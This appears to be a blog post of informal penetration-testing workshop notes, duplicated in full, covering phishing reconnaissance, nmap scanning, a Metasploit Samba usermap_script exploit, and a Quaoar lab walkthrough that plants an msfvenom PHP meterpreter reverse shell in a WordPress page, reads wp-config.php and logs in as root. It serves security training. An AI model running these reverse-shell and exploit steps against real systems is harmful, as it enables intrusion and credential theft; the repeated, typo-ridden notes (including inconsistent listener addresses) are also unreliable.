CISCO workshop
==================== PHISHING CAMPAIGN ==================================================
Passive Reconnaisance
-----------------------------------------------------------------------------------------
site.sqcury, qwtera is a virus total vendor
crawling --> digging into a site
namecheap --> can buy all kinds of domains.. phishing sites as well.
check for patterns and directories
typosquatting --> url hijacking
phishng sites:
http://cawpmnttraffi.com/ --> limitedverz.info -->
pishtank --> cisco's
campaigns --> 1000 sites comprise can drop a malware (phishing campaign)
https://sitecheck.sucuri.net/ --> check phishng sites; https://www.virustotal.com/
==============================================================================================================
--------------------------------------------------------------------------------------------------------------
==============================================================================================================
nmap --> uses 2 way handshake
------------------------------------------------------------------------------------------------------
================================Active RECONNAISANCE==================================================
------------------------------------------------------------------------------------------------------
find the ip's in the network
-----------------------------
netdiscover -r IP_range
nmap Working:
--------------------
nmap logic is its gonna knock and it gonna "ask are you there!, is port 22 open, it resonds and replies.
nmap sends a syn and wait, sends a fin and waits, all it needs is the port exits or not
its a Combination of arp, netbios and ping. its fingerpringing, finding out the target.
does a arp scan then pings ,..
cripting engine --> can invoke a script as well.
nmap has 3 outputs --> open,closed, filtered
nmap 192.168.25.102
nmap -R 192.168.25.102
--> check for old versions to get vulnerabilities
nmap -sS -sV 192.168.25.102 // -sS = syn scan(stealth), -sV = version scan\
nmap -sS -sV -O -vv 192.168.25.102 // -vv = verbose -o = os
nmap scans frequenly used ports .. 1000 ports
enum4linux 192.168.56.102 // enumeration - get more details on the network
dirb site_address
-----------------------------------------------------------------------------------------------------------
======================================= METASPLOIT ========================================================
-----------------------------------------------------------------------------------------------------------
shell = to enter kernel
metasploit built on ruby
metasploit payloads works as dlls
meterpreter shell is stealth.
single and staged(established a connection, pushes a code to work on it ) payload
reverse shell = once you get a shell, give it back to me. connect me again
-----------------------------------------------------------------------------------------
EXPLOITING SAMBA VULNERABILITY
-----------------------------------------------------------------------------------------
msfconsole
use exploit/multi/samba/usermap_script
show options
set RHOST 192.168.149.102
set LHOST 192.168.149.101
set LPORT 4444
show options
run
svchost.exe --> collection of dlls'
google bombing
emoted trojans
--------------------------------------------------------------------------------------------------------------
=================================== HACKING QUAOAR ========================================================
---------------------------------------------------------------------------------------------------------------
netdiscover -r ip
ping target
nmap -sS -sV -O -vv ip
--> if port 80 is open
dirb http://ip
check for robots.txt --> ip/robots.txt
check for the application version
enum4linux ip
check for usernames and accounts
----------------------------------------------------
niktos --> fingerpringing tool for checking the applications
nikto -h taraget_IP
beautiful soup --> python crawler
------------------------------------------------------------
quaror has a wordpres in built, so we need to check to wp vunlerabilities
wpscan --url http://192.168.56.101/wordpress
//check for users
wpscan --url http://192.168.56.101/wordpress --enumerate user
msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.56.101 lport=4444 –f raw > shell.php
//paste the code into the wp page
msfconsole
use exploit multi/handler
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.56.102
set lport 4444
// open the wp page that you
exploit the shit
//go into the wp-config.php file
//download and open it or use
cat wp-config.php
ssh root@192.168.56.101
rootpassword!
==================== PHISHING CAMPAIGN ==================================================
Passive Reconnaisance
-----------------------------------------------------------------------------------------
site.sqcury, qwtera is a virus total vendor
crawling --> digging into a site
namecheap --> can buy all kinds of domains.. phishing sites as well.
check for patterns and directories
typosquatting --> url hijacking
phishng sites:
http://cawpmnttraffi.com/ --> limitedverz.info -->
pishtank --> cisco's
campaigns --> 1000 sites comprise can drop a malware (phishing campaign)
https://sitecheck.sucuri.net/ --> check phishng sites; https://www.virustotal.com/
==============================================================================================================
--------------------------------------------------------------------------------------------------------------
==============================================================================================================
nmap --> uses 2 way handshake
------------------------------------------------------------------------------------------------------
================================Active RECONNAISANCE==================================================
------------------------------------------------------------------------------------------------------
find the ip's in the network
-----------------------------
netdiscover -r IP_range
nmap Working:
--------------------
nmap logic is its gonna knock and it gonna "ask are you there!, is port 22 open, it resonds and replies.
nmap sends a syn and wait, sends a fin and waits, all it needs is the port exits or not
its a Combination of arp, netbios and ping. its fingerpringing, finding out the target.
does a arp scan then pings ,..
cripting engine --> can invoke a script as well.
nmap has 3 outputs --> open,closed, filtered
nmap 192.168.25.102
nmap -R 192.168.25.102
--> check for old versions to get vulnerabilities
nmap -sS -sV 192.168.25.102 // -sS = syn scan(stealth), -sV = version scan\
nmap -sS -sV -O -vv 192.168.25.102 // -vv = verbose -o = os
nmap scans frequenly used ports .. 1000 ports
enum4linux 192.168.56.102 // enumeration - get more details on the network
dirb site_address
-----------------------------------------------------------------------------------------------------------
======================================= METASPLOIT ========================================================
-----------------------------------------------------------------------------------------------------------
shell = to enter kernel
metasploit built on ruby
metasploit payloads works as dlls
meterpreter shell is stealth.
single and staged(established a connection, pushes a code to work on it ) payload
reverse shell = once you get a shell, give it back to me. connect me again
-----------------------------------------------------------------------------------------
EXPLOITING SAMBA VULNERABILITY
-----------------------------------------------------------------------------------------
msfconsole
use exploit/multi/samba/usermap_script
show options
set RHOST 192.168.149.102
set LHOST 192.168.149.101
set LPORT 4444
show options
run
svchost.exe --> collection of dlls'
google bombing
emoted trojans
--------------------------------------------------------------------------------------------------------------
=================================== HACKING QUAOAR ========================================================
---------------------------------------------------------------------------------------------------------------
netdiscover -r ip
ping target
nmap -sS -sV -O -vv ip
--> if port 80 is open
dirb http://ip
check for robots.txt --> ip/robots.txt
check for the application version
enum4linux ip
check for usernames and accounts
----------------------------------------------------
niktos --> fingerpringing tool for checking the applications
nikto -h taraget_IP
beautiful soup --> python crawler
------------------------------------------------------------
quaror has a wordpres in built, so we need to check to wp vunlerabilities
wpscan --url http://192.168.56.101/wordpress
//check for users
wpscan --url http://192.168.56.101/wordpress --enumerate user
msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.56.101 lport=4444 –f raw > shell.php
//paste the code into the wp page
msfconsole
use exploit multi/handler
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.56.102
set lport 4444
// open the wp page that you
exploit the shit
//go into the wp-config.php file
//download and open it or use
cat wp-config.php
ssh root@192.168.56.101
rootpassword!
Comments
Post a Comment